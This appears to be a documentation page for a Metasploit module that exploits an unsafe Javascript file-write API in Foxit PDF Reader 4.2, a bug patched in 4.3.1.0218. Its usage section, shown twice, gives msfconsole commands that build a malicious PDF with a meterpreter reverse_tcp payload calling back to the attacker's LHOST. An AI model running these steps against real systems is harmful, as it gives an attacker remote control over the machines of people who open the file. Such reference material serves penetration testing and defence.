Foxit PDF Reader 4.2 Javascript File Write
This module exploits an unsafe Javascript API implemented in Foxit PDF Reader version 4.2. The createDataObject() Javascript API function allows for writing arbitrary files to the file system. This issue was fixed in version 4.3.1.0218. Note: This exploit uses the All Users directory currently, which required administrator privileges to write to. This means an administrative user has to open the file to be successful. Kind of lame but thats how it goes sometimes in the world of file write bugs.
Exploit Rank
- Normal
Exploit Authors
- bannedit < bannedit [at] metasploit.com >
- Chris Evans < >
Vulnerability References
Exploit Targets
- 0 - Automatic (default)
- 1 - Foxit PDF Reader v4.2 (Windows XP SP0-SP3)
- 2 - Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)
Exploit Development
Similar Exploit Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/foxit_reader_filewrite
msf exploit(foxit_reader_filewrite) > show payloads
msf exploit(foxit_reader_filewrite) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(foxit_reader_filewrite) > set LHOST [MY IP ADDRESS]
msf exploit(foxit_reader_filewrite) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/foxit_reader_filewrite
msf exploit(foxit_reader_filewrite) > show payloads
msf exploit(foxit_reader_filewrite) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(foxit_reader_filewrite) > set LHOST [MY IP ADDRESS]
msf exploit(foxit_reader_filewrite) > exploit
Exploit Module Options
| DECODER | The decoder script. (default: vbs_b64) |
| FILENAME | The file name. (default: msf.pdf) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EXE::Custom | Use custom exe instead of automatically generating a payload exe |
| EXE::FallBack | Use the default template in case the specified one is missing |
| EXE::Inject | Set to preserve the original EXE function |
| EXE::OldMethod | Set to use the substitution EXE generation method. |
| EXE::Path | The directory in which to look for the executable template |
| EXE::Template | The executable template file name. |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |